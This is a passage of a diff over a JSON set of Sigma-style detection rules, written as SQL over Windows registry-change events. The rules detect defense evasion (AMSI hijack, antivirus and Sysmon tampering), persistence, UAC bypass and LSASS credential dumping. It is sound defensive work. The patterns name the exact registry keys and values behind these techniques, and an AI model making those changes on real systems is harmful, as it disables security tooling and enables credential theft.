NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "registry_event_stickykey_like_backdoor.yml" }, { - "title": "Potential AutoLogger Sessions Tampering", - "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", - "status": "experimental", - "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Camera and Microphone Access", + "id": "62120148-6b7a-42be-8b91-271c04e281a3", + "status": "test", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "author": "Den Iuzvyk", "tags": [ - "attack.defense_evasion" + "attack.collection", + "attack.t1125", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_autologger_sessions.yml" + "filename": "registry_event_susp_mic_cam_access.yml" }, { - "title": "Potential AMSI COM Server Hijacking", - "id": "160d2780-31f7-4922-8b3a-efce30e63e96", - "status": "experimental", - "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "RedMimicry Winnti Playbook Registry Manipulation", + "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" - ], - "filename": "registry_set_amsi_com_hijack.yml" - }, - { - "title": "Potential Persistence Via Excel Add-in - Registry", - "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", - "status": "experimental", - "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND NewValue LIKE '/R %' ESCAPE '\\' AND NewValue LIKE '%.xll' ESCAPE '\\')" - ], - "filename": "registry_set_persistence_xll.yml" - }, - { - "title": "Tamper With Sophos AV Registry Keys", - "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "status": "experimental", - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" ], - "filename": "registry_set_sophos_av_tamper.yml" + "filename": "registry_event_redmimicry_winnti_reg.yml" }, { - "title": "Registry Persitence via Service in Safe Mode", - "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", + "id": "55e29995-75e7-451a-bef0-6225e2f13597", "status": "experimental", - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "author": "frack113", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND NewValue = 'Service') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" ], - "filename": "registry_set_add_load_service_in_safe_mode.yml" + "filename": "registry_event_silentprocessexit_lsass.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Registry", - "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "title": "Shell Open Registry Keys Manipulation", + "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND NewValue = 'Binary Data')" - ], - "filename": "registry_set_uac_bypass_wmp.yml" - }, - { - "title": "Disable Macro Runtime Scan Scope", - "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "status": "experimental", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" - ], - "filename": "registry_set_disable_macroruntimescanscope.yml" - }, - { - "title": "Set TimeProviders DllName", - "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", - "status": "experimental", - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" - ], - "filename": "registry_set_timeproviders_dllname.yml" - }, - { - "title": "New RUN Key Pointing to Suspicious Folder", - "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "status": "experimental", - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "falsepositives": [ - "Software using weird folders for updates" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((NewValue LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (NewValue LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR NewValue LIKE 'wscript%' ESCAPE '\\' OR NewValue LIKE 'cscript%' ESCAPE '\\')))" - ], - "filename": "registry_set_susp_run_key_img_folder.yml" - }, - { - "title": "Change the Fax Dll", - "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", - "status": "experimental", - "description": "Detect possible persistence using Fax DLL load when service restart", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (NewValue LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" - ], - "filename": "registry_set_fax_dll_persistance.yml" - }, - { - "title": "Change Winevt Event Access Permission Via Registry", - "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "status": "experimental", - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.t1548.002", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (NewValue LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))))" ], - "filename": "registry_set_change_winevt_channelaccess.yml" + "filename": "registry_event_shell_open_keys_manipulation.yml" }, { - "title": "Suspicious Printer Driver Empty Manufacturer", - "id": "e0813366-0407-449a-9869-a2db1119dc41", + "title": "Esentutl Volume Shadow Copy Service Keys", + "id": "5aad0995-46ab-41bd-a9ff-724f41114971", "status": "test", - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" - ], - "falsepositives": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND NewValue = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" - ], - "filename": "registry_set_susp_printer_driver.yml" - }, - { - "title": "Registry Disable System Restore", - "id": "5de03871-5d46-4539-a82d-3aa992a69a83", - "status": "experimental", - "description": "Detects the modification of the registry to disable a system restore on the computer", - "author": "frack113", - "tags": [ - "attack.impact", - "attack.t1490" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" - ], - "filename": "registry_set_disable_system_restore.yml" - }, - { - "title": "Add Port Monitor Persistence in Registry", - "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", - "status": "experimental", - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1547.010" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" - ], - "filename": "registry_set_add_port_monitor.yml" - }, - { - "title": "Usage of Renamed Sysinternals Tools - RegistrySet", - "id": "8023f872-3f1d-4301-a384-801889917ab4", - "status": "experimental", - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" - ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" - }, - { - "title": "Disable Sysmon Event Logging Via Registry", - "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "status": "experimental", - "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "author": "B.Talebi", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate driver altitude change to hide sysmon" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" - ], - "filename": "registry_set_change_sysmon_driver_altitude.yml" - }, - { - "title": "Disabled RestrictedAdminMode For RDS", - "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1112" + "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND NewProcessName LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" ], - "filename": "registry_set_lsa_disablerestrictedadmin.yml" + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" }, { - "title": "Suspicious Application Allowed Through Exploit Guard", - "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", - "status": "experimental", - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Narrator's Feedback-Hub Persistence", + "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "status": "test", + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" + "filename": "registry_event_narrator_feedback_persistance.yml" }, { - "title": "Potential Persistence Via Mpnotify", - "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", + "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + "Legitimate administrators removing applications (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_mpnotify.yml" + "filename": "registry_delete_exploit_guard_protected_folders.yml" }, { - "title": "Custom File Open Handler Executes PowerShell", - "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", - "status": "experimental", - "description": "Detects the abuse of custom file open handler, executing powershell", - "author": "CD_R0M_", + "title": 